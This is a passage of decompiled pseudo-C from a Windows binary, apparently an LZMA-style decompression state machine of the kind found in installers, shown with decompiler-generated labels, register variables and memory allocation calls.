                                                                                                                                                                                                              									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                              									__edx = _t191;
                                                                                                                                                                                                              									L79:
                                                                                                                                                                                                              									 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                              									L80:
                                                                                                                                                                                                              									 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                              									goto L1;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L40;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								L36:
                                                                                                                                                                                                              								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              									 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                                                              									L170:
                                                                                                                                                                                                              									_t568 = 0x22;
                                                                                                                                                                                                              									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                                                                                                              									_t535 = 0;
                                                                                                                                                                                                              									L172:
                                                                                                                                                                                                              									return _t535;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								_t121 = __ebp - 0x70;
                                                                                                                                                                                                              								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								goto L38;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					L1:
                                                                                                                                                                                                              					_t534 =  *(_t614 - 0x88);
                                                                                                                                                                                                              					if(_t534 > 0x1c) {
                                                                                                                                                                                                              						L171:
                                                                                                                                                                                                              						_t535 = _t534 | 0xffffffff;
                                                                                                                                                                                                              						goto L172;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              						case 0:
                                                                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                              							_t534 =  *( *(_t614 - 0x70));
                                                                                                                                                                                                              							if(_t534 > 0xe1) {
                                                                                                                                                                                                              								goto L171;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                              							_push(0x2d);
                                                                                                                                                                                                              							asm("cdq");
                                                                                                                                                                                                              							_pop(_t570);
                                                                                                                                                                                                              							_push(9);
                                                                                                                                                                                                              							_pop(_t571);
                                                                                                                                                                                                              							_t610 = _t538 / _t570;
                                                                                                                                                                                                              							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                                              							asm("cdq");
                                                                                                                                                                                                              							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                                              							 *(_t614 - 0x3c) = _t605;
                                                                                                                                                                                                              							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                                                                                                              							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                                              							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                                                                                                              							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                              								if(_t613 == 0) {
                                                                                                                                                                                                              									L12:
                                                                                                                                                                                                              									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                                                                                                              									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                                                              									goto L15;
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									goto L11;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								do {
                                                                                                                                                                                                              									L11:
                                                                                                                                                                                                              									_t613 = _t613 - 1;
                                                                                                                                                                                                              									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                                                                                                              								} while (_t613 != 0);
                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if( *(_t614 - 4) != 0) {
                                                                                                                                                                                                              								GlobalFree( *(_t614 - 4));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              							 *(_t614 - 4) = _t534;
                                                                                                                                                                                                              							if(_t534 == 0) {
                                                                                                                                                                                                              								goto L171;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                                                                                                              								goto L10;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 1:
                                                                                                                                                                                                              							L13:
                                                                                                                                                                                                              							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(_t614 - 0x88) = 1;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                                                                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                              							_t45 = _t614 - 0x48;
                                                                                                                                                                                                              							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                                                                                                              							__eflags =  *_t45;
                                                                                                                                                                                                              							L15:
                                                                                                                                                                                                              							if( *(_t614 - 0x48) < 4) {
                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t546 =  *(_t614 - 0x40);
                                                                                                                                                                                                              							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                                                                                                              								L20:
                                                                                                                                                                                                              								 *(_t614 - 0x48) = 5;
                                                                                                                                                                                                              								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                              								goto L23;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t614 - 0x74) = _t546;
                                                                                                                                                                                                              							if( *(_t614 - 8) != 0) {
                                                                                                                                                                                                              								GlobalFree( *(_t614 - 8));
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                                                                                                              							 *(_t614 - 8) = _t534;
                                                                                                                                                                                                              							if(_t534 == 0) {
                                                                                                                                                                                                              								goto L171;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 2:
                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                              							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                                                                                                              							 *(_t614 - 0x84) = 6;
                                                                                                                                                                                                              							 *(_t614 - 0x4c) = _t553;
                                                                                                                                                                                                              							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                                                                              							goto L132;
                                                                                                                                                                                                              						case 3:
                                                                                                                                                                                                              							L21:
                                                                                                                                                                                                              							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(_t614 - 0x88) = 3;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                              							_t67 = _t614 - 0x70;
                                                                                                                                                                                                              							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                              							__eflags =  *_t67;
                                                                                                                                                                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                              							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                                                                                                              							if( *(_t614 - 0x48) != 0) {
                                                                                                                                                                                                              								goto L21;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L24;
                                                                                                                                                                                                              						case 4:
                                                                                                                                                                                                              							goto L133;
                                                                                                                                                                                                              						case 5:
                                                                                                                                                                                                              							goto L137;
                                                                                                                                                                                                              						case 6:
                                                                                                                                                                                                              							goto L0;
                                                                                                                                                                                                              						case 7:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              								__eax = 0;
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              								__al = __al & 0x000000fd;
                                                                                                                                                                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                                                                              								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              								goto L68;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 4);
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              							 *(__ebp - 0x84) = 8;
                                                                                                                                                                                                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              							goto L132;
                                                                                                                                                                                                              						case 8:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                              								__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L132;
                                                                                                                                                                                                              						case 9:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								goto L89;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x60);
                                                                                                                                                                                                              							if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                              								goto L171;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax = 0;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                              							__eflags = _t258;
                                                                                                                                                                                                              							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                              							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                              							goto L75;
                                                                                                                                                                                                              						case 0xa:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                              								goto L132;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                              							goto L88;
                                                                                                                                                                                                              						case 0xb:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                                              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                                              							L88:
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                                              							L89:
                                                                                                                                                                                                              							__eax =  *(__ebp - 4);
                                                                                                                                                                                                              							 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                                              							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                                              							goto L68;
                                                                                                                                                                                                              						case 0xc:
                                                                                                                                                                                                              							L99:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t334 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t334;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              							goto L101;
                                                                                                                                                                                                              						case 0xd:
                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                              						case 0xe:
                                                                                                                                                                                                              							goto L45;
                                                                                                                                                                                                              						case 0xf:
                                                                                                                                                                                                              							goto L57;
                                                                                                                                                                                                              						case 0x10:
                                                                                                                                                                                                              							L109:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t365 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t365;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							goto L111;
                                                                                                                                                                                                              						case 0x11:
                                                                                                                                                                                                              							L68:
                                                                                                                                                                                                              							__esi =  *(__ebp - 0x58);
                                                                                                                                                                                                              							 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                                              							goto L132;
                                                                                                                                                                                                              						case 0x12:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                              								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                              								goto L132;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              							__eflags = __eax;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                              							goto L130;
                                                                                                                                                                                                              						case 0x13:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                              								_t469 = __ebp - 0x58;
                                                                                                                                                                                                              								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                              								__eflags =  *_t469;
                                                                                                                                                                                                              								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                              								 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                              								L144:
                                                                                                                                                                                                              								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                              								goto L145;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                              							 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                              							L130:
                                                                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              							 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                              							goto L144;
                                                                                                                                                                                                              						case 0x14:
                                                                                                                                                                                                              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                              							goto L140;
                                                                                                                                                                                                              						case 0x15:
                                                                                                                                                                                                              							__eax = 0;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                              							__al = __al & 0x000000fd;
                                                                                                                                                                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                              							goto L120;
                                                                                                                                                                                                              						case 0x16:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              							__eflags = __eax - 4;
                                                                                                                                                                                                              							if(__eax >= 4) {
                                                                                                                                                                                                              								_push(3);
                                                                                                                                                                                                              								_pop(__eax);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              							 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                              							__eax = __eax << 7;
                                                                                                                                                                                                              							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                              							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              							goto L145;
                                                                                                                                                                                                              						case 0x17:
                                                                                                                                                                                                              							L145:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              							 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                              							goto L149;
                                                                                                                                                                                                              						case 0x18:
                                                                                                                                                                                                              							L146:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                              							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							_t484 = __ebp - 0x70;
                                                                                                                                                                                                              							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              							__eflags =  *_t484;
                                                                                                                                                                                                              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							L148:
                                                                                                                                                                                                              							_t487 = __ebp - 0x48;
                                                                                                                                                                                                              							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                              							__eflags =  *_t487;
                                                                                                                                                                                                              							L149:
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                              								__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                              								0 = 1;
                                                                                                                                                                                                              								__eax = 1 << __cl;
                                                                                                                                                                                                              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                              								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              								goto L140;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__eax = __eax - __ecx;
                                                                                                                                                                                                              								__edx = __edx + 1;
                                                                                                                                                                                                              								__eflags = __edx;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              								 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								goto L148;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								goto L146;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						case 0x19:
                                                                                                                                                                                                              							__eflags = __ebx - 4;
                                                                                                                                                                                                              							if(__ebx < 4) {
                                                                                                                                                                                                              								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                              								L119:
                                                                                                                                                                                                              								_t393 = __ebp - 0x2c;
                                                                                                                                                                                                              								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                              								__eflags =  *_t393;
                                                                                                                                                                                                              								L120:
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                                                                              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                              									goto L170;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                              								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                              									goto L171;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                              								_t400 = __ebp - 0x60;
                                                                                                                                                                                                              								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                              								__eflags =  *_t400;
                                                                                                                                                                                                              								goto L123;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx = __ebx;
                                                                                                                                                                                                              							__eax = __ebx;
                                                                                                                                                                                                              							__ecx = __ebx >> 1;
                                                                                                                                                                                                              							__eax = __ebx & 0x00000001;
                                                                                                                                                                                                              							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                              							__al = __al | 0x00000002;
                                                                                                                                                                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                              							__eflags = __ebx - 0xe;
                                                                                                                                                                                                              							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              							if(__ebx >= 0xe) {
                                                                                                                                                                                                              								__ebx = 0;
                                                                                                                                                                                                              								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                              								L102:
                                                                                                                                                                                                              								__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                              								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                              									__eax = __eax + __ebx;
                                                                                                                                                                                                              									 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                              									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                              									__eax =  *(__ebp - 4);
                                                                                                                                                                                                              									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                                                                              									L108:
                                                                                                                                                                                                              									__ebx = 0;
                                                                                                                                                                                                              									 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                              									 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                              									 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                              									 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                              									L112:
                                                                                                                                                                                                              									__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
